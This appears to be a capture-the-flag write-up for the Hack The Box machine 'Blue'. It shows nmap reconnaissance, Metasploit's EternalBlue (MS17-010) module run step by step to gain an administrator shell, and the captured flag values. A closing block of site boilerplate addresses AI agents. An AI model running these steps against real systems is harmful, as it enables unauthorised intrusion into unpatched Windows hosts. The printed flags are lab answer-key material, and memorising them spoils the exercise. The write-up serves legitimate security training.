> For the complete documentation index, see [llms.txt](https://sgtdiddlywink.gitbook.io/htb/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/blue.md).

# Blue

<figure><img src="/files/xTu8P71u565bT3MKYLPC" alt=""><figcaption></figcaption></figure>

## TARGET IP: 10.10.10.40

## HOST IP: 10.10.16.10

### RECON

#### NMAP

```
nmap [Target IP]
```

<figure><img src="/files/ci2j9cKKZbfAOAgvCFvc" alt=""><figcaption></figcaption></figure>

```
nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 [Target IP]
```

<figure><img src="/files/wkp4TKMgqwYnrYocVvWl" alt=""><figcaption></figcaption></figure>

* Looks like we have SMB open and some RPC open on other ports as well.&#x20;
* Based on the name alone, I'm highly suspicious that this thing is susceptible to eternal blue. I'm going to use an Nmap scan I found in a previous lab to check.

```
nmap -p 445 --script smb-protocols {TARGET IP]
```

<figure><img src="/files/vOHM5fKDCMoo4CxxCdwY" alt=""><figcaption></figcaption></figure>

* Based on the fact that it allows for `SMBv1` and it is running Windows 7, I'm fairly confident that we could probably get Eternal Blue to run.

### Exploit

### Eternal Blue

```
msfconsole
search smb
use windows/smb/ms17_010_eternalblue
show options
```

* Use the `set` command to set the different options.&#x20;

```
set rhosts [Target IP]
set lhost [Host IP]
```

<figure><img src="/files/u9CheyyJzfAwUvgR16K2" alt=""><figcaption></figcaption></figure>

* Now let's check to see if the host is vulnerable before moving forward.

```
check
```

![](/files/AeJcjFqDnaruvSXq0OWM)

* Looks favorable. Let's exploit.

```
exploit
```

![](/files/DoHIX0oVr7DvBpzX2pFE)

* Let's start a command prompt shell and verify who we are.

```
shell
whoami
```

![](/files/ypLsPpcTFVGiaFdf8u6O)

* And now I have administrator privileges on the machine. Wow that was easy. Let's go grab the flags.

```
type C:\Users\haris\Desktop\user.txt
```

<figure><img src="/files/sjSLZpc5EeXDtJL2vw52" alt=""><figcaption></figcaption></figure>

```
9ba10e548f8c18db7f90a5d1c5e2abc4
```

```
type C:\Users\Administrator\Desktop\root.txt
```

<figure><img src="/files/GwxvZ20v8fp4kfq89M1b" alt=""><figcaption></figcaption></figure>

```
77a3bb72c76512c79b243e5235c38958
```

### Conclusion

* This was really easy and I had a feeling it was going to be really easy. Since I first saw the name of this machine and that it was a Windows machine, I already guessed it was going to be an eternal blue exploit.
* I skipped a LOT of steps in the process that I normally would not have but since I already had a pretty good idea of where to go, I figured I would give that a try. Worst case scenario it doesn't work and I go back to my usual process of Recon and Enumeration to discover other methods.
* Having done a coupe of other labs with Eternal Blue, I already knew how to exploit this machine so it was pretty quick. It's also scary to think how easy this tool is to use to immediately gain admin power in a system. Good job on creating an awesome tool NSA agents.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/blue.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
